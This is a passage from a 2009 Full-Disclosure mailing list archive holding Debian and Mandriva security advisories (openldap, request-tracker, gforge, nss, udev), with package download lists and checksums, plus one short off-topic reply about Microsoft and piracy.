http://security.debian.org/pool/updates/main/o/openldap/libldap-2.4-2-dbg_2.4.11-1+lenny1_arm.deb Size/MD5 checksum: 280140 ccaed923684d35304f50f27fc6b868b3 http://security.debian.org/pool/updates/main/o/openldap/ldap-utils_2.4.11-1+lenny1_arm.deb Size/MD5 checksum: 248918 a08cf9fd18ce8806be437c364179c2b3 http://security.debian.org/pool/updates/main/o/openldap/libldap2-dev_2.4.11-1+lenny1_arm.deb Size/MD5 checksum: 877400 614df898211cc5311a62159f6ee21b93 http://security.debian.org/pool/updates/main/o/openldap/slapd_2.4.11-1+lenny1_arm.deb Size/MD5 checksum: 1405962 5e1e62d6f0a5984486fa2eaa478eab38 http://security.debian.org/pool/updates/main/o/openldap/libldap-2.4-2_2.4.11-1+lenny1_arm.deb Size/MD5 checksum: 180520 96b5fe5d50b9a1d59eb5ab03489a1b90 http://security.debian.org/pool/updates/main/o/openldap/slapd-dbg_2.4.11-1+lenny1_arm.deb Size/MD5 checksum: 3572646 a8e804a9e966a57306a9229acd11ff80 hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/o/openldap/slapd_2.4.11-1+lenny1_hppa.deb Size/MD5 checksum: 1533292 8d5c2d83596b10c9d3ee7a4dcb692026 http://security.debian.org/pool/updates/main/o/openldap/slapd-dbg_2.4.11-1+lenny1_hppa.deb Size/MD5 checksum: 3619256 2ad8452962291b553fadc8bb6398f834 http://security.debian.org/pool/updates/main/o/openldap/libldap-2.4-2_2.4.11-1+lenny1_hppa.deb Size/MD5 checksum: 200874 27205d8a86701cb133f7507eeef5e76a http://security.debian.org/pool/updates/main/o/openldap/libldap-2.4-2-dbg_2.4.11-1+lenny1_hppa.deb Size/MD5 checksum: 283816 1163f67e39b08c10cf492b24bd526f24 http://security.debian.org/pool/updates/main/o/openldap/ldap-utils_2.4.11-1+lenny1_hppa.deb Size/MD5 checksum: 264158 905749f1e385f9d93c2358b05dc42dfb http://security.debian.org/pool/updates/main/o/openldap/libldap2-dev_2.4.11-1+lenny1_hppa.deb Size/MD5 checksum: 999386 6a071952604a9c30483fca7f3a3754ec i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/o/openldap/libldap-2.4-2_2.4.11-1+lenny1_i386.deb Size/MD5 checksum: 189442 879dac84b581979646c49bde9743c630 http://security.debian.org/pool/updates/main/o/openldap/libldap-2.4-2-dbg_2.4.11-1+lenny1_i386.deb Size/MD5 checksum: 286808 2dcb4f8e5514d9e4d9072b4853da322d http://security.debian.org/pool/updates/main/o/openldap/libldap2-dev_2.4.11-1+lenny1_i386.deb Size/MD5 checksum: 892068 449ba5d6037617e4e93dfd6bcb093549 http://security.debian.org/pool/updates/main/o/openldap/slapd-dbg_2.4.11-1+lenny1_i386.deb Size/MD5 checksum: 3560322 c6a6fbc66944bd05585c1065ab012c93 http://security.debian.org/pool/updates/main/o/openldap/ldap-utils_2.4.11-1+lenny1_i386.deb Size/MD5 checksum: 244952 5a5b31ebb9098059e62eb57d209a6846 http://security.debian.org/pool/updates/main/o/openldap/slapd_2.4.11-1+lenny1_i386.deb Size/MD5 checksum: 1404266 a3bffb93ec3b0d0d130a6a7e29091a9b ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/o/openldap/slapd-dbg_2.4.11-1+lenny1_ia64.deb Size/MD5 checksum: 3589108 d34afb06a3b21ad7267ef5d31b6ad322 http://security.debian.org/pool/updates/main/o/openldap/libldap2-dev_2.4.11-1+lenny1_ia64.deb Size/MD5 checksum: 932026 1194a002673f8a73cf382c2333c7882b http://security.debian.org/pool/updates/main/o/openldap/ldap-utils_2.4.11-1+lenny1_ia64.deb Size/MD5 checksum: 352020 e40c570396514fee0c6eee3920be2607 http://security.debian.org/pool/updates/main/o/openldap/libldap-2.4-2-dbg_2.4.11-1+lenny1_ia64.deb Size/MD5 checksum: 269084 1720388cc8102f33122375034a703a05 http://security.debian.org/pool/updates/main/o/openldap/libldap-2.4-2_2.4.11-1+lenny1_ia64.deb Size/MD5 checksum: 259018 658248f4329555e81896800709302575 http://security.debian.org/pool/updates/main/o/openldap/slapd_2.4.11-1+lenny1_ia64.deb Size/MD5 checksum: 2006532 6ad20563d8999759f32445576fd69856 mips architecture (MIPS (Big Endian)) http://security.debian.org/pool/updates/main/o/openldap/slapd-dbg_2.4.11-1+lenny1_mips.deb Size/MD5 checksum: 3712752 8d48a2797c1f4e6b5dea203698e4b31c http://security.debian.org/pool/updates/main/o/openldap/libldap-2.4-2_2.4.11-1+lenny1_mips.deb Size/MD5 checksum: 180956 88613b463fcdba79539048ce681d4f5e http://security.debian.org/pool/updates/main/o/openldap/ldap-utils_2.4.11-1+lenny1_mips.deb Size/MD5 checksum: 260240 f6fa5402a6fc03aef4b87735030969c5 http://security.debian.org/pool/updates/main/o/openldap/libldap2-dev_2.4.11-1+lenny1_mips.deb Size/MD5 checksum: 854756 76ad64ab6fe85c5bfc654266101e024a http://security.debian.org/pool/updates/main/o/openldap/slapd_2.4.11-1+lenny1_mips.deb Size/MD5 checksum: 1394436 4930b2b56c642182c8ccd69d5bc53685 http://security.debian.org/pool/updates/main/o/openldap/libldap-2.4-2-dbg_2.4.11-1+lenny1_mips.deb Size/MD5 checksum: 302106 3672bab4d2c0c037a1d9c0a61fa16139 powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/o/openldap/slapd-dbg_2.4.11-1+lenny1_powerpc.deb Size/MD5 checksum: 3718584 7b120292ce66e7ea85b3ad623da0bb4e http://security.debian.org/pool/updates/main/o/openldap/libldap-2.4-2-dbg_2.4.11-1+lenny1_powerpc.deb Size/MD5 checksum: 295146 f131ea5cdbab25c2416ff06f6697bc08 http://security.debian.org/pool/updates/main/o/openldap/libldap-2.4-2_2.4.11-1+lenny1_powerpc.deb Size/MD5 checksum: 199248 c683d506deb5fadabea906c9dec36c9f http://security.debian.org/pool/updates/main/o/openldap/slapd_2.4.11-1+lenny1_powerpc.deb Size/MD5 checksum: 1536614 b5c37ae6f72127bdf6910100edeb06e5 http://security.debian.org/pool/updates/main/o/openldap/libldap2-dev_2.4.11-1+lenny1_powerpc.deb Size/MD5 checksum: 907106 6af4614c092e6ccda8580e6a73cb8728 http://security.debian.org/pool/updates/main/o/openldap/ldap-utils_2.4.11-1+lenny1_powerpc.deb Size/MD5 checksum: 284952 b75e2ddab46ddab036ef40b21cec63ee sparc architecture (Sun SPARC/UltraSPARC) http://security.debian.org/pool/updates/main/o/openldap/libldap2-dev_2.4.11-1+lenny1_sparc.deb Size/MD5 checksum: 872178 a7739e034d0df26a69e0cb569802d594 http://security.debian.org/pool/updates/main/o/openldap/ldap-utils_2.4.11-1+lenny1_sparc.deb Size/MD5 checksum: 249022 334ecf73608e20ec6cff79716cf10fde http://security.debian.org/pool/updates/main/o/openldap/slapd_2.4.11-1+lenny1_sparc.deb Size/MD5 checksum: 1387990 4935db487abd61e04adb3a846ed7aadc http://security.debian.org/pool/updates/main/o/openldap/libldap-2.4-2-dbg_2.4.11-1+lenny1_sparc.deb Size/MD5 checksum: 260980 006fdd6b90293fdf1331442ccabde568 http://security.debian.org/pool/updates/main/o/openldap/libldap-2.4-2_2.4.11-1+lenny1_sparc.deb Size/MD5 checksum: 182822 73c3edfab6b52e772ed36c990c13f210 http://security.debian.org/pool/updates/main/o/openldap/slapd-dbg_2.4.11-1+lenny1_sparc.deb Size/MD5 checksum: 3502906 c19b8875ae915cec344bb74a5e462e44 These files will probably be moved into the stable distribution on its next update. - --------------------------------------------------------------------------------- For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce at lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.10 (GNU/Linux) iEYEARECAAYFAksW4AQACgkQNxpp46476aqFDwCfZRJ0eCTLZ7Wvra3eWlaVIVsK mWIAniapjMkolimxTFStHJO6vlEk4Fnj =WbVZ -----END PGP SIGNATURE----- From white at debian.org Thu Dec 3 11:04:51 2009 From: white at debian.org (Steffen Joeris) Date: Thu, 3 Dec 2009 22:04:51 +1100 (EST) Subject: [Full-disclosure] [SECURITY] [DSA 1944-1] New request-tracker packages fix session hijack vulnerability Message-ID: <20091203110451.7A4C9848974@hannah.localdomain> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------ Debian Security Advisory DSA-1944-1 security at debian.org http://www.debian.org/security/ Steffen Joeris December 03, 2009 http://www.debian.org/security/faq - ------------------------------------------------------------------------ Package : request-tracker3.4/request-tracker3.6 Vulnerability : session hijack Problem type : remote Debian-specific: no CVE Id : CVE-2009-3585 Mikal Gule discovered that request-tracker, an extensible trouble-ticket tracking system, is prone to an attack, where an attacker with access to the same domain can hijack a user's RT session. For the stable distribution (lenny), this problem has been fixed in version 3.6.7-5+lenny3. For the oldstable distribution (etch), this problem has been fixed in version 3.6.1-4+etch1 of request-tracker3.6 and version 3.4.5-2+etch1 of request-tracker3.4. For the testing distribution (squeeze), this problem will be fixed soon. For the unstable distribution (sid), this problem has been fixed in version 3.6.9-2. We recommend that you upgrade your request-tracker packages. Upgrade instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 4.0 alias etch - ------------------------------- Debian (oldstable) - ------------------ Oldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/r/request-tracker3.4/request-tracker3.4_3.4.5-2+etch1.diff.gz Size/MD5 checksum: 24450 41891b8a012e671b706facdf4ece3402 http://security.debian.org/pool/updates/main/r/request-tracker3.6/request-tracker3.6_3.6.1-4+etch1.diff.gz Size/MD5 checksum: 23488 3c3914d16ad3e719cd502e2490561cc0 http://security.debian.org/pool/updates/main/r/request-tracker3.6/request-tracker3.6_3.6.1-4+etch1.dsc Size/MD5 checksum: 916 c03c1972b5ccab3574f9dfdd3fec0bee http://security.debian.org/pool/updates/main/r/request-tracker3.4/request-tracker3.4_3.4.5-2+etch1.dsc Size/MD5 checksum: 876 5a18cf29db217c6fd2265f6923a938cb http://security.debian.org/pool/updates/main/r/request-tracker3.4/request-tracker3.4_3.4.5.orig.tar.gz Size/MD5 checksum: 1410154 16c8007cba54669e6c9de95cfc680b2a http://security.debian.org/pool/updates/main/r/request-tracker3.6/request-tracker3.6_3.6.1.orig.tar.gz Size/MD5 checksum: 1545708 40c5a828fadaeef9e150255a517d0b17 Architecture independent packages: http://security.debian.org/pool/updates/main/r/request-tracker3.6/rt3.6-apache2_3.6.1-4+etch1_all.deb Size/MD5 checksum: 118264 318517b3d5539a84dee1639710048d92 http://security.debian.org/pool/updates/main/r/request-tracker3.6/rt3.6-apache_3.6.1-4+etch1_all.deb Size/MD5 checksum: 117786 6f3da07edc9499cc282ceed8e71cf26d http://security.debian.org/pool/updates/main/r/request-tracker3.4/rt3.4-clients_3.4.5-2+etch1_all.deb Size/MD5 checksum: 120578 e404452bd2f9128255550644b26c72de http://security.debian.org/pool/updates/main/r/request-tracker3.4/request-tracker3.4_3.4.5-2+etch1_all.deb Size/MD5 checksum: 1198788 9af1648e53a722155dfd9acaaaf364cd http://security.debian.org/pool/updates/main/r/request-tracker3.4/rt3.4-apache_3.4.5-2+etch1_all.deb Size/MD5 checksum: 92002 009fe1090c6142409210f3304f63240d http://security.debian.org/pool/updates/main/r/request-tracker3.6/request-tracker3.6_3.6.1-4+etch1_all.deb Size/MD5 checksum: 1315556 9a06544261bd4b7800ae89065d4f4317 http://security.debian.org/pool/updates/main/r/request-tracker3.6/rt3.6-clients_3.6.1-4+etch1_all.deb Size/MD5 checksum: 146902 8c4a83429ef704025849373a24cf06d5 http://security.debian.org/pool/updates/main/r/request-tracker3.4/rt3.4-apache2_3.4.5-2+etch1_all.deb Size/MD5 checksum: 92402 2737f376b27e6c3087dd355e5977edb5 Debian GNU/Linux 5.0 alias lenny - -------------------------------- Debian (stable) - --------------- Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/r/request-tracker3.6/request-tracker3.6_3.6.7.orig.tar.gz Size/MD5 checksum: 1764471 46c0b29cd14010ee6a3f181743aeb6ef http://security.debian.org/pool/updates/main/r/request-tracker3.6/request-tracker3.6_3.6.7-5+lenny3.dsc Size/MD5 checksum: 1623 b8a904d8fa89cf4ea78fce2d95d95701 http://security.debian.org/pool/updates/main/r/request-tracker3.6/request-tracker3.6_3.6.7-5+lenny3.diff.gz Size/MD5 checksum: 51485 7b588a81fe9cbaa4bd9ac7d07b76d8f8 Architecture independent packages: http://security.debian.org/pool/updates/main/r/request-tracker3.6/rt3.6-db-mysql_3.6.7-5+lenny3_all.deb Size/MD5 checksum: 185574 f71cdd55d18a69d908eea7f35434098c http://security.debian.org/pool/updates/main/r/request-tracker3.6/rt3.6-db-sqlite_3.6.7-5+lenny3_all.deb Size/MD5 checksum: 185676 82fe2682e028c113f469117937649636 http://security.debian.org/pool/updates/main/r/request-tracker3.6/rt3.6-apache2_3.6.7-5+lenny3_all.deb Size/MD5 checksum: 187274 15328ffc1f76bd4e864c9c0faf4a4724 http://security.debian.org/pool/updates/main/r/request-tracker3.6/rt3.6-db-postgresql_3.6.7-5+lenny3_all.deb Size/MD5 checksum: 185576 6c40b8a471370911da6e12cdc6b85727 http://security.debian.org/pool/updates/main/r/request-tracker3.6/request-tracker3.6_3.6.7-5+lenny3_all.deb Size/MD5 checksum: 1540476 9d2cff7aca09a68a7b2707f91a6272ca http://security.debian.org/pool/updates/main/r/request-tracker3.6/rt3.6-clients_3.6.7-5+lenny3_all.deb Size/MD5 checksum: 215800 5052e370d018a81b9b786eb539b7cb05 These files will probably be moved into the stable distribution on its next update. - --------------------------------------------------------------------------------- For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce at lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.10 (GNU/Linux) iEYEARECAAYFAksXmlIACgkQ62zWxYk/rQe7CwCffi6lD3X3MxWHeaRR4DcBZsnK ApQAoILoVRZB9DlEMUGfVn8mQv803rrB =Ywu+ -----END PGP SIGNATURE----- From ccckr at hotmail.com Thu Dec 3 11:34:51 2009 From: ccckr at hotmail.com (Maky Pevnser) Date: Thu, 3 Dec 2009 12:34:51 +0100 Subject: [Full-disclosure] =?windows-1252?q?Microsoft=3A_=91Piracy_no_long?= =?windows-1252?q?er_poses_a_threat_to_us=92?= In-Reply-To: <6450e99d0912022124l37c16b86of4b606a05a7e7506@mail.gmail.com> References: <6450e99d0912022124l37c16b86of4b606a05a7e7506@mail.gmail.com> Message-ID: The big deal for Microsoft are the agreements with Acer/HP/Compaq/Dell etc for the "embedded" OS license and pre-installation. Since Vista the final user is no longer the main Microsoft's target. Plus the top 500 Fortune companies using corporate agreements, the Government Agencies, the International firms. Final user is merely considered, by Microsoft, an extra... On Dec 3, 2009, at 6:24 AM, Ivan . wrote: > In a recent interview, managing director of Microsoft Philippines Inc., John Bessey, has claimed that piracy no longer poses a threat to the software giant. > > http://freakbits.com/microsoft-piracy-no-longer-poses-a-threat-to-us-1202 > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20091203/15c30956/attachment.html From white at debian.org Thu Dec 3 12:46:30 2009 From: white at debian.org (Steffen Joeris) Date: Thu, 3 Dec 2009 23:46:30 +1100 (EST) Subject: [Full-disclosure] [SECURITY] [DSA 1945-1] New gforge packages fix denial of service Message-ID: <20091203124630.733EA848704@hannah.localdomain> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------ Debian Security Advisory DSA-1945-1 security at debian.org http://www.debian.org/security/ Steffen Joeris December 03, 2009 http://www.debian.org/security/faq - ------------------------------------------------------------------------ Package : gforge Vulnerability : symlink attack Problem type : local Debian-specific: no CVE ID : CVE-2009-3304 Sylvain Beucler discovered that gforge, a collaborative development tool, is prone to a symlink attack, which allows local users to perform a denial of service attack by overwriting arbitrary files. For the stable distribution (lenny), this problem has been fixed in version 4.7~rc2-7lenny3. The oldstable distribution (etch), this problem has been fixed in version 4.5.14-22etch13. For the testing distribution (squeeze), this problem will be fixed soon. For the unstable distribution (sid), this problem has been fixed in version 4.8.2-1. We recommend that you upgrade your gforge packages. Upgrade instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 4.0 alias etch - ------------------------------- Debian (oldstable) - ------------------ Oldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/g/gforge/gforge_4.5.14-22etch13.dsc Size/MD5 checksum: 953 a170b517b1d68ca0ad53a1b8b03c3317 http://security.debian.org/pool/updates/main/g/gforge/gforge_4.5.14.orig.tar.gz Size/MD5 checksum: 2161141 e85f82eff84ee073f80a2a52dd32c8a5 http://security.debian.org/pool/updates/main/g/gforge/gforge_4.5.14-22etch13.diff.gz Size/MD5 checksum: 204328 33081d2f6a0056b31091360db3002a9f Architecture independent packages: http://security.debian.org/pool/updates/main/g/gforge/gforge-shell-ldap_4.5.14-22etch13_all.deb Size/MD5 checksum: 86628 c6b62116a819fa9033335acae8df867d http://security.debian.org/pool/updates/main/g/gforge/gforge-common_4.5.14-22etch13_all.deb Size/MD5 checksum: 1012268 78dfb2931853c3f89d233cc9510199f2 http://security.debian.org/pool/updates/main/g/gforge/gforge-db-postgresql_4.5.14-22etch13_all.deb Size/MD5 checksum: 212786 1bc973b449b07020fbef4519fc8e074e http://security.debian.org/pool/updates/main/g/gforge/gforge-web-apache_4.5.14-22etch13_all.deb Size/MD5 checksum: 705446 286aba34673375cb8763765fd241d791 http://security.debian.org/pool/updates/main/g/gforge/gforge-ftp-proftpd_4.5.14-22etch13_all.deb Size/MD5 checksum: 86344 394f14f010e9de88145cc3251e7e8982 http://security.debian.org/pool/updates/main/g/gforge/gforge_4.5.14-22etch13_all.deb Size/MD5 checksum: 80562 52133da4596347d8c05e37643a959435 http://security.debian.org/pool/updates/main/g/gforge/gforge-mta-postfix_4.5.14-22etch13_all.deb Size/MD5 checksum: 88808 72ad3b9f7d9d1f8732551a99b5e74471 http://security.debian.org/pool/updates/main/g/gforge/gforge-mta-courier_4.5.14-22etch13_all.deb Size/MD5 checksum: 76368 c7ba219bac6560994c07dfb639801c99 http://security.debian.org/pool/updates/main/g/gforge/gforge-mta-exim4_4.5.14-22etch13_all.deb Size/MD5 checksum: 89414 095ca81a4671193cd5d822e967d36684 http://security.debian.org/pool/updates/main/g/gforge/gforge-shell-postgresql_4.5.14-22etch13_all.deb Size/MD5 checksum: 87434 8d960c7671eac2a480a43cd948a98d7d http://security.debian.org/pool/updates/main/g/gforge/gforge-mta-exim_4.5.14-22etch13_all.deb Size/MD5 checksum: 88904 8d3692ecc555ca40558d50333bf543a9 http://security.debian.org/pool/updates/main/g/gforge/gforge-lists-mailman_4.5.14-22etch13_all.deb Size/MD5 checksum: 82386 3bc6d055f6eb74edfd23ca8dbfb8fa3e http://security.debian.org/pool/updates/main/g/gforge/gforge-ldap-openldap_4.5.14-22etch13_all.deb Size/MD5 checksum: 95738 beee5393efe02def8071a78a3707244c http://security.debian.org/pool/updates/main/g/gforge/gforge-dns-bind9_4.5.14-22etch13_all.deb Size/MD5 checksum: 104062 a70e01f8055201519b14718555023abb Debian GNU/Linux 5.0 alias lenny - -------------------------------- Debian (stable) - --------------- Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/g/gforge/gforge_4.7~rc2-7lenny3.diff.gz Size/MD5 checksum: 106204 cd0b909a3d31bc9a0649a6f16bd54478 http://security.debian.org/pool/updates/main/g/gforge/gforge_4.7~rc2-7lenny3.dsc Size/MD5 checksum: 1487 24e0ca65d2b17abd34328dd21994dd9a http://security.debian.org/pool/updates/main/g/gforge/gforge_4.7~rc2.orig.tar.gz Size/MD5 checksum: 10225404 bd24808ce79363d4c7c529778f6f5324 Architecture independent packages: http://security.debian.org/pool/updates/main/g/gforge/gforge-plugin-mediawiki_4.7~rc2-7lenny3_all.deb Size/MD5 checksum: 213590 e252b1c97bda1c020e89c30e5faacac8 http://security.debian.org/pool/updates/main/g/gforge/gforge-dns-bind9_4.7~rc2-7lenny3_all.deb Size/MD5 checksum: 106960 acdbec4148e84ccfaf6993cbbddf9dd2 http://security.debian.org/pool/updates/main/g/gforge/gforge-mta-courier_4.7~rc2-7lenny3_all.deb Size/MD5 checksum: 88822 cbc85f52ffca569001a0bb7b0ec8d3dc http://security.debian.org/pool/updates/main/g/gforge/gforge-shell-postgresql_4.7~rc2-7lenny3_all.deb Size/MD5 checksum: 95136 452be3de57f17866b0de3d3f19c0072f http://security.debian.org/pool/updates/main/g/gforge/gforge-common_4.7~rc2-7lenny3_all.deb Size/MD5 checksum: 1112248 25679e24ad18e5a910a8d43808ebac13 http://security.debian.org/pool/updates/main/g/gforge/gforge-db-postgresql_4.7~rc2-7lenny3_all.deb Size/MD5 checksum: 231056 3523089618564cec5703a4f8bf8eaa6e http://security.debian.org/pool/updates/main/g/gforge/gforge-mta-postfix_4.7~rc2-7lenny3_all.deb Size/MD5 checksum: 101588 30efdc5330cf09bf91afb2fe12c58db3 http://security.debian.org/pool/updates/main/g/gforge/gforge-mta-exim4_4.7~rc2-7lenny3_all.deb Size/MD5 checksum: 100824 8dcc63a9768d2dd192566dccf3c07a9e http://security.debian.org/pool/updates/main/g/gforge/gforge-web-apache_4.7~rc2-7lenny3_all.deb Size/MD5 checksum: 88550 b62b84da2aff9e56860667ce193f3351 http://security.debian.org/pool/updates/main/g/gforge/gforge-plugin-scmsvn_4.7~rc2-7lenny3_all.deb Size/MD5 checksum: 122072 bdd9b60445fdf1e1af9a943d9250af7b http://security.debian.org/pool/updates/main/g/gforge/gforge-web-apache2_4.7~rc2-7lenny3_all.deb Size/MD5 checksum: 1397376 6bd8964fea18f429267972ee471d8d06 http://security.debian.org/pool/updates/main/g/gforge/gforge_4.7~rc2-7lenny3_all.deb Size/MD5 checksum: 92884 9c1029863905773f982f524d5394b934 http://security.debian.org/pool/updates/main/g/gforge/gforge-lists-mailman_4.7~rc2-7lenny3_all.deb Size/MD5 checksum: 94654 dfb3d71e7ebdee27ec7bcf8a536477c4 http://security.debian.org/pool/updates/main/g/gforge/gforge-ftp-proftpd_4.7~rc2-7lenny3_all.deb Size/MD5 checksum: 97388 aee4295339ef21d98e8f067ab6625aea http://security.debian.org/pool/updates/main/g/gforge/gforge-plugin-scmcvs_4.7~rc2-7lenny3_all.deb Size/MD5 checksum: 129550 65f1fd24bda024f8ff2e4d87ca68c605 These files will probably be moved into the stable distribution on its next update. - --------------------------------------------------------------------------------- For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce at lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.10 (GNU/Linux) iEYEARECAAYFAksXspEACgkQ62zWxYk/rQe+LwCffe3DoBLTw8TwKNSPw6fDwkHS bG0An2CcZ9u3QpF2GdYUEoDglrh2WVSQ =F3JX -----END PGP SIGNATURE----- From security at mandriva.com Thu Dec 3 15:29:00 2009 From: security at mandriva.com (security at mandriva.com) Date: Thu, 03 Dec 2009 16:29:00 +0100 Subject: [Full-disclosure] [ MDVSA-2009:197-3 ] nss Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2009:197-3 http://www.mandriva.com/security/ _______________________________________________________________________ Package : nss Date : December 3, 2009 Affected: 2008.0 _______________________________________________________________________ Problem Description: Security issues in nss prior to 3.12.3 could lead to a man-in-the-middle attack via a spoofed X.509 certificate (CVE-2009-2408) and md2 algorithm flaws (CVE-2009-2409), and also cause a denial-of-service and possible code execution via a long domain name in X.509 certificate (CVE-2009-2404). This update provides the latest versions of NSS and NSPR libraries which are not vulnerable to those attacks. Update: Packages for 2008.0 are being provided due to extended support for Corporate products. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2408 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2409 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2404 _______________________________________________________________________ Updated Packages: Mandriva Linux 2008.0: 6aaa636e2160b8b784904273680a8999 2008.0/i586/libnspr4-4.7.5-0.1mdv2008.0.i586.rpm 87752fe7629a26066b58aaf8e3509ce9 2008.0/i586/libnspr-devel-4.7.5-0.1mdv2008.0.i586.rpm 5950ef5f7750ce69f8505a0d271a654b 2008.0/i586/libnss3-3.12.3.1-0.1mdv2008.0.i586.rpm cb2705cae30e6090947e637d76649cbb 2008.0/i586/libnss-devel-3.12.3.1-0.1mdv2008.0.i586.rpm ceff8722716e8dbada153376cb673239 2008.0/i586/libnss-static-devel-3.12.3.1-0.1mdv2008.0.i586.rpm 666ca07f9d4f5ed6e720f033d77c8a00 2008.0/i586/nss-3.12.3.1-0.1mdv2008.0.i586.rpm 1c6c224afbfff232533e68a4a022ae97 2008.0/SRPMS/nspr-4.7.5-0.1mdv2008.0.src.rpm 33cd024a0584b13ddbe39ae1f7e62d46 2008.0/SRPMS/nss-3.12.3.1-0.1mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: be078aecd681468224b73c1c8c920bd9 2008.0/x86_64/lib64nspr4-4.7.5-0.1mdv2008.0.x86_64.rpm 41ad25f4383999189cded7c55ed37062 2008.0/x86_64/lib64nspr-devel-4.7.5-0.1mdv2008.0.x86_64.rpm 6e3394c9cf3fc81149907518b9b6707b 2008.0/x86_64/lib64nss3-3.12.3.1-0.1mdv2008.0.x86_64.rpm 90c5234752f41c6d922c02e83031e5be 2008.0/x86_64/lib64nss-devel-3.12.3.1-0.1mdv2008.0.x86_64.rpm 5bff6a89fae610df25a8fb6a95224acd 2008.0/x86_64/lib64nss-static-devel-3.12.3.1-0.1mdv2008.0.x86_64.rpm 18859c654e9f4c3dfcdd90dcf4da551a 2008.0/x86_64/nss-3.12.3.1-0.1mdv2008.0.x86_64.rpm 1c6c224afbfff232533e68a4a022ae97 2008.0/SRPMS/nspr-4.7.5-0.1mdv2008.0.src.rpm 33cd024a0584b13ddbe39ae1f7e62d46 2008.0/SRPMS/nss-3.12.3.1-0.1mdv2008.0.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFLF64QmqjQ0CJFipgRApgGAJ9TZOgJ09SVNXjOIUwVS+70MDeIswCgw/ER Rv/NKlCK/9Hv4LvLzZclLM0= =KTug -----END PGP SIGNATURE----- From security at mandriva.com Thu Dec 3 17:05:00 2009 From: security at mandriva.com (security at mandriva.com) Date: Thu, 03 Dec 2009 18:05:00 +0100 Subject: [Full-disclosure] [ MDVSA-2009:103-1 ] udev Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2009:103-1 http://www.mandriva.com/security/ _______________________________________________________________________ Package : udev Date : December 3, 2009 Affected: 2008.0 _______________________________________________________________________ Problem Description: Security vulnerabilities have been identified and fixed in udev. udev before 1.4.1 does not verify whether a NETLINK message originates from kernel space, which allows local users to gain privileges by sending a NETLINK message from user space (CVE-2009-1185). Buffer overflow in the util_path_encode function in udev/lib/libudev-util.c in udev before 1.4.1 allows local users to cause a denial of service (service outage) via vectors that trigger a call with crafted arguments (CVE-2009-1186). The updated packages have been patched to prevent this. Update: Packages for 2008.0 are being provided due to extended support for Corporate products. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1185 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1186 _______________________________________________________________________ Updated Packages: Mandriva Linux 2008.0: 8268a6d9b8b782f008c6bad08081aa1f 2008.0/i586/libvolume_id0-114-7.1mdv2008.0.i586.rpm f25010279ad483a4bd1df3300be1eff5 2008.0/i586/libvolume_id0-devel-114-7.1mdv2008.0.i586.rpm 527afa06fad5b28de6ba60c12c5cc685 2008.0/i586/udev-114-7.1mdv2008.0.i586.rpm b472ccee86044dba507029b63385e306 2008.0/i586/udev-doc-114-7.1mdv2008.0.i586.rpm 33a3aeb9701b9a90b776b08595055f05 2008.0/i586/udev-tools-114-7.1mdv2008.0.i586.rpm b6057c15bb22b381d07ee45a6bc81974 